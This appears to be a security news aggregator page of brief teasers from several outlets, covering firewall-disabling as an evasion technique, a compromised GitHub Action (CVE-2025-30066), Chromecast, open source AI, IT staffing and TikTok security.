Disable or Modify System Firewallis a defense evasion technique that adversaries use to manipulate firewall settings to bypass security controls and facilitate malicious activities. Firewalls are critical security components designed to monitor and control network traffic, blocking unauthorized access and preventing malicious communication. By disabling or modifying firewall configurations, attackers can move laterally within a network, exfiltrate data, or establish persistent command-and-control (C2) channels without being detected.

by Picus Security

Google''s reliable casting device has been around for over a decade, and while it will eventually be phased out, it''s still useful for more than just streaming your favorite shows.

by ZDNET Security

Open source AI is accelerating cloud-native innovation, providing scalable infrastructure and model development tools, but enterprises face challenges in governance, cost, and complexity.

by ITPro Today

Immediately update secrets that may have leaked due to the compromise of the changed-files GitHub Action via CVE-2025-30066.

by Kaspersky

As baby boomers retire, IT teams face a critical knowledge gap; businesses must adapt by investing in mentorship, modern tools, and strategic staffing to ensure long-term success.

by ITPro Today

Are the company''s new security features enough to quiet the anti-TikTok voices?

by ZDNET Security